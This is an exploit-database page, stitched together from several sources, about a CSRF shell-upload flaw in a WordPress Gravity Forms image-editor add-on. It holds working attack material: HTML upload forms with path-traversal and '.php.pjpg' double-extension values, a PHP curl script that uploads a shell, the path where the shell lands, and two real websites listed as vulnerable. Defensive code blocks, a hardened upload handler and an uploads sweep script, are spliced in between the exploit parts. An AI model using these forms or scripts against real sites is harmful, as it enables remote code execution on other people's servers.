WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability

CVE: none listed
Category: CWE-352
Price: Not specified
Severity: Critical
Author: Exploit Alert Team
Risk: Critical
Exploitation Type: Remote
Date: 2020-03-23
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.0458
EPSS percentile (EPSSP): 0.67124

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030128

Below is a copy:

WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
####################################################################

# Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/03/2020
# Vendor Homepage : wordpress.org
# Software Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/
# Software Affected Version : 3.0 (Beta r7) and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress 
is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected 
computer; this can result in arbitrary code execution within the context of the 
vulnerable application.
Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable; 
other versions may also be affected.

CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed, 
valid, consistent request was intentionally provided by the user who submitted the request.

When a web server is designed to receive a request from a client without any mechanism 
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a 
client into making an unintentional request to the web server which will be treated as an 
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and 
can result in exposure of data or unintended code execution.

CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and 
other security features that are used to perform access control.

CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can 
be automatically processed within the product's environment.
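The three weaknesses above correspond to three checks that an upload endpoint must perform before it writes anything to disk: a request token proving the request came from a page the site rendered for this user (CWE-352), a capability check (CWE-264), and validation of the whole filename and of the file content rather than of the last extension only (CWE-434). The following is an added example of such a handler written against the WordPress plugin API; it is not the plugin's own code and not from the advisory's author. The AJAX action name `gform_aviary_upload`, the nonce action of the same name, the `gfa_` function prefix and the allow-list of image extensions are assumptions chosen for illustration; `wp_verify_nonce`, `current_user_can`, `sanitize_file_name`, `wp_check_filetype_and_ext`, `wp_handle_upload` and `wp_send_json_error` are real WordPress functions.

```php
<?php
// Added example: a hardened upload handler for a WordPress plugin.
// Not the plugin's own code; hook, nonce action and prefix are illustrative.

/**
 * True only if $name has exactly one extension and it is allow-listed.
 * Rejects "shell.php.pjpg", "x.phtml", "a/b.png", "", and names with NUL.
 */
function gfa_filename_is_safe( string $name, array $allowed_exts ): bool {
    if ( $name === '' || strpbrk( $name, "/\\\0" ) !== false ) {
        return false;                     // path separators or NUL in a client name
    }
    $parts = explode( '.', $name );
    if ( count( $parts ) !== 2 || $parts[0] === '' ) {
        return false;                     // no extension, or more than one
    }
    return in_array( strtolower( $parts[1] ), $allowed_exts, true );
}

/**
 * Form and field ids are small positive integers; anything else
 * (for example "../../../") must never reach a filesystem path.
 */
function gfa_id_is_safe( $id ): bool {
    return is_scalar( $id ) && preg_match( '/^[1-9][0-9]{0,9}$/', (string) $id ) === 1;
}

function gfa_handle_upload() {
    // CWE-352: the request must carry a nonce minted for this action.
    $nonce = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'gform_aviary_upload' ) ) {
        wp_send_json_error( array( 'message' => 'Invalid request token' ), 403 );
    }
    // CWE-264: only users who may upload media can use the endpoint at all.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }
    // Ids with path components are rejected outright, not sanitised into place.
    if ( ! gfa_id_is_safe( $_POST['form_id'] ?? '' ) || ! gfa_id_is_safe( $_POST['field_id'] ?? '' ) ) {
        wp_send_json_error( array( 'message' => 'Invalid form or field id' ), 400 );
    }
    if ( empty( $_FILES['file']['tmp_name'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file received' ), 400 );
    }

    $allowed = array( 'jpg', 'jpeg', 'png', 'gif' );      // assumed allow-list
    $name    = sanitize_file_name( $_FILES['file']['name'] );

    // CWE-434: validate the filename as a whole, then the content.
    if ( ! gfa_filename_is_safe( $name, $allowed ) ) {
        wp_send_json_error( array( 'message' => 'Unsupported file type' ), 415 );
    }
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $name );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) || strpos( $check['type'], 'image/' ) !== 0 ) {
        wp_send_json_error( array( 'message' => 'Content does not match an allowed image type' ), 415 );
    }

    // wp_handle_upload() re-checks the type and places the file under the
    // uploads directory with a unique name; test_form is false because this
    // is not the standard media form.
    $overrides = array(
        'test_form' => false,
        'mimes'     => array( 'jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' ),
    );
    $result = wp_handle_upload( $_FILES['file'], $overrides );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 500 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}

// Only the logged-in action is registered: there is deliberately no
// 'wp_ajax_nopriv_' hook, so anonymous callers never reach the handler.
add_action( 'wp_ajax_gform_aviary_upload', 'gfa_handle_upload' );
```

The page that renders the upload form must emit the matching token, for example with `wp_nonce_field( 'gform_aviary_upload' )`, and submit to `admin-ajax.php` with `action=gform_aviary_upload` rather than to a plugin file that is reachable directly. Routing through `admin-ajax.php` also means the endpoint cannot be called before WordPress has loaded its authentication layer, which is what makes the nonce and capability checks possible.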

####################################################################

# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 => 
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

# CSRF Cross Site Request Forgery Exploit 2 => 
****************************************
<html>
<head>
<title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title>
</head>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>

# CSRF Cross Site Request Forgery Exploit 3=> 
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>


PHP Exploiter Code : 
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Vulnerability Error : 
********************
{"status":"error","message":"Unsupported File Type. Supported files","code":null}

{"status":"error","message":"Unsupported File Type. Supported files"}

Directory File Path :
******************
/wp-content/uploads/gform_aviary/_[SHELL].php.pjpg
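The artifact path above tells a responder what a successful upload leaves behind: a file under `wp-content/uploads/gform_aviary/` whose name carries an executable extension in a middle segment. The following added script (not from the advisory and not part of the plugin) sweeps an uploads directory for that pattern and, independently of the name, for files whose first bytes contain a PHP open tag. The `gfa_` prefix, the `GFA_EXEC_EXTS` list and the command-line usage are assumptions; the script uses only PHP's standard library.

```php
<?php
// Added example: sweep an uploads directory for files matching the
// double-extension artifact or carrying PHP code regardless of name.
// Usage (assumed):  php sweep_uploads.php /var/www/html/wp-content/uploads/gform_aviary

const GFA_EXEC_EXTS = array( 'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht' );

/** True if any dot-separated segment after the basename is an executable extension. */
function gfa_has_executable_segment( string $name ): bool {
    $segments = array_slice( explode( '.', strtolower( $name ) ), 1 );
    return count( array_intersect( $segments, GFA_EXEC_EXTS ) ) > 0;
}

/** True if the first 512 bytes contain a PHP open tag, whatever the extension says. */
function gfa_has_php_tag( string $path ): bool {
    $head = @file_get_contents( $path, false, null, 0, 512 );
    return $head !== false && preg_match( '/<\?(php|=)/i', $head ) === 1;
}

/** Return [path, reason] pairs for every suspicious file under $dir (recursive). */
function gfa_sweep( string $dir ): array {
    $findings = array();
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $it as $file ) {
        if ( ! $file->isFile() ) {
            continue;
        }
        $reasons = array();
        if ( gfa_has_executable_segment( $file->getFilename() ) ) {
            $reasons[] = 'executable extension segment';
        }
        if ( gfa_has_php_tag( $file->getPathname() ) ) {
            $reasons[] = 'PHP open tag in content';
        }
        if ( $reasons ) {
            $findings[] = array( $file->getPathname(), implode( ', ', $reasons ) );
        }
    }
    return $findings;
}

if ( PHP_SAPI === 'cli' && isset( $argv[1] ) && is_dir( $argv[1] ) ) {
    foreach ( gfa_sweep( $argv[1] ) as [ $path, $why ] ) {
        printf( "%s\t%s\n", $path, $why );
    }
}
```

Whether a `.php.pjpg` name is actually executed depends on how the web server maps extensions to handlers, which is why the content check is kept separate from the name check: a hit on either is worth examining, and a hit on both is a strong indicator. Denying PHP execution under `wp-content/uploads` at the web-server level removes the impact of this class of upload even where the name check is bypassed.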

####################################################################

# Example Vulnerable Sites :
************************
[+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php

[+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.
